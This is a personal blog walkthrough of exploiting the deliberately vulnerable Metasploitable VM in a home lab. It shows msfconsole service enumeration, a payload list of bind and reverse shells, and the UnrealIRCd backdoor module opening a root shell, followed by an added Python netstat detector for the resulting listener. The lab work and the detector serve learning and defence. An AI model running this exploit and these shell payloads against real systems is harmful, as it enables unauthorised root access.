Greetings People - In my first post, I felt like I owed a few details. This time I'll get a little more detailed. Why write about Metasploitable? Because it's an easy and fun way to learn how to manage the msfconsole. Let's begin... Set the parameters and give the VM a name:

Followed by:

We got a:

You must enable PAE/NX under System > Processor > Enable PAE/NX:

Put the VM in Bridged Adapter mode so that it gets an IP address, and under Advanced select "Allow All":

And, finally, we've got our VM:

Log in and type ifconfig. The default username and password are both msfadmin:

Fire up msfconsole:

If you remember in my first post, I was not able to open a session because I didn't want to erase the old hosts. Let's do that now:

    msf > hosts -d

    Hosts
    =====

    address  mac  name  os_name  os_flavor  os_sp  purpose  info  comments
    -------  ---  ----  -------  ---------  -----  -------  ----  --------

    [*] Deleted 1 hosts

OK, now let's hack that machine...

    msf > services

    Services
    ========

    host         port  proto  name         state  info
    ----         ----  -----  ----         -----  ----
    192.168.1.3  21    tcp    ftp          open   vsftpd 2.3.4
    192.168.1.3  22    tcp    ssh          open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
    192.168.1.3  23    tcp    telnet       open   Linux telnetd
    192.168.1.3  25    tcp    smtp         open   Postfix smtpd
    192.168.1.3  53    tcp    domain       open   ISC BIND 9.4.2
    192.168.1.3  80    tcp    http         open   Apache httpd 2.2.8 (Ubuntu) DAV/2
    192.168.1.3  111   tcp    rpcbind      open   2 RPC#100000
    192.168.1.3  139   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
    192.168.1.3  445   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
    192.168.1.3  512   tcp    exec         open   netkit-rsh rexecd
    192.168.1.3  513   tcp    login        open
    192.168.1.3  514   tcp    tcpwrapped   open
    192.168.1.3  1099  tcp    rmiregistry  open   GNU Classpath grmiregistry
    192.168.1.3  1524  tcp    shell        open   Metasploitable root shell
    192.168.1.3  2049  tcp    nfs          open   2-4 RPC#100003
    192.168.1.3  2121  tcp    ccproxy-ftp  open
    192.168.1.3  3306  tcp    mysql        open   MySQL 5.0.51a-3ubuntu5
    192.168.1.3  5432  tcp    postgresql   open   PostgreSQL DB 8.3.0 - 8.3.7
    192.168.1.3  5900  tcp    vnc          open   VNC protocol 3.3
    192.168.1.3  6000  tcp    x11          open   access denied
    192.168.1.3  6667  tcp    irc          open   Unreal ircd
    192.168.1.3  8009  tcp    ajp13        open   Apache Jserv Protocol v1.3
    192.168.1.3  8180  tcp    http         open   Apache Tomcat/Coyote JSP engine 1.1

    msf exploit(unreal_ircd_3281_backdoor) > show payloads

    Compatible Payloads
    ===================

    Name                                Disclosure Date  Rank    Description
    ----                                ---------------  ----    -----------
    cmd/unix/bind_perl                                   normal  Unix Command Shell, Bind TCP (via Perl)
    cmd/unix/bind_perl_ipv6                              normal  Unix Command Shell, Bind TCP (via perl) IPv6
    cmd/unix/bind_ruby                                   normal  Unix Command Shell, Bind TCP (via Ruby)
    cmd/unix/bind_ruby_ipv6                              normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
    cmd/unix/generic                                     normal  Unix Command, Generic Command Execution
    cmd/unix/reverse                                     normal  Unix Command Shell, Double Reverse TCP (telnet)
    cmd/unix/reverse_perl                                normal  Unix Command Shell, Reverse TCP (via Perl)
    cmd/unix/reverse_perl_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via perl)
    cmd/unix/reverse_ruby                                normal  Unix Command Shell, Reverse TCP (via Ruby)
    cmd/unix/reverse_ruby_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via Ruby)
    cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)

    msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.1.3
    RHOST => 192.168.1.3
    msf exploit(unreal_ircd_3281_backdoor) > set PAYLOAD cmd/unix/bind_perl
    PAYLOAD => cmd/unix/bind_perl
    msf exploit(unreal_ircd_3281_backdoor) > show options

    Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    RHOST  192.168.1.3      yes       The target address
    RPORT  6667             yes       The target port

    Payload options (cmd/unix/bind_perl):

    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    LPORT  4444             yes       The listen port
    RHOST  192.168.1.3      no        The target address

    Exploit target:

    Id  Name
    --  ----
    0   Automatic Target

    msf exploit(unreal_ircd_3281_backdoor) > exploit

    [*] Started bind handler
    [*] 192.168.1.3:6667 - Connected to 192.168.1.3:6667...
        :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
        :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
    [*] 192.168.1.3:6667 - Sending backdoor command...
    [*] Command shell session 1 opened (192.168.1.2:55724 -> 192.168.1.3:4444) at 2016-03-20 20:48:08 +0100

    whoami
    root
    date
    Sun Mar 20 15:47:23 EDT 2016
    echo HI CYBRARY
    HI CYBRARY
    ^C
    Abort session 1? [y/N] y

    [*] 192.168.1.3 - Command shell session 1 closed. Reason: User exit

That's what I wanted to see last time... It looks like Metasploit has some new banners. I'll let you find out on your own.

That's it. I hope you liked it. Finally, type the IP of the VM into a browser (in my case 192.168.1.3) and have some more fun:

Till next time...bye from @Dabxxl
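Seen from the lab VM, the bind_perl payload's LPORT 4444 is a port that does not appear in the services table above. The following is an added example, not part of the original post: it compares `netstat -tanp` output from the VM against that table and flags new listeners and interpreter-owned sockets. The sample rows, PIDs and the interpreter list are constructed assumptions.

```python
import re

# TCP ports from the `services` table in this post (the lab VM's known baseline).
BASELINE_PORTS = {21, 22, 23, 25, 53, 80, 111, 139, 445, 512, 513, 514, 1099, 1524,
                  2049, 2121, 3306, 5432, 5900, 6000, 6667, 8009, 8180}
# Assumption: interpreters that should never own a network socket on this VM.
# perl and ruby are the runtimes named by the payloads listed in the post.
INTERPRETERS = {"perl", "ruby", "sh", "bash"}

# One TCP row of `netstat -tanp` (net-tools column layout).
ROW = re.compile(r"^tcp6?\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<remote>\S+)"
                 r"\s+(?P<state>[A-Z_0-9]+)\s+(?P<owner>\S+)")

def findings(netstat_text, baseline=BASELINE_PORTS):
    """Return sorted (reason, local_port, state, program) tuples for suspicious sockets."""
    out = set()
    for line in netstat_text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue  # header line or non-TCP row
        port = int(m["local"].rsplit(":", 1)[1])  # rsplit also handles ":::22"
        # owner is "PID/program", or "-" when netstat ran without root
        program = m["owner"].split("/", 1)[1] if "/" in m["owner"] else "unknown"
        state = m["state"]
        if state == "LISTEN" and port not in baseline:
            out.add(("new-listener", port, state, program))
        if program in INTERPRETERS:
            out.add(("interpreter-socket", port, state, program))
    return sorted(out)

# Constructed sample: two baseline listeners, one SSH login, one listener on 4444.
SAMPLE = """\
Proto Recv-Q Send-Q Local Address      Foreign Address     State       PID/Program name
tcp        0      0 0.0.0.0:6667       0.0.0.0:*           LISTEN      4626/unrealircd
tcp        0      0 0.0.0.0:22         0.0.0.0:*           LISTEN      4301/sshd
tcp        0      0 0.0.0.0:4444       0.0.0.0:*           LISTEN      5012/perl
tcp        0      0 192.168.1.3:22     192.168.1.2:40112   ESTABLISHED 5100/sshd
"""

if __name__ == "__main__":
    for finding in findings(SAMPLE):
        print(finding)
```

Run netstat as root on the VM so the PID/Program column is populated; without it every owner is reported as "unknown" and only the port rule can fire.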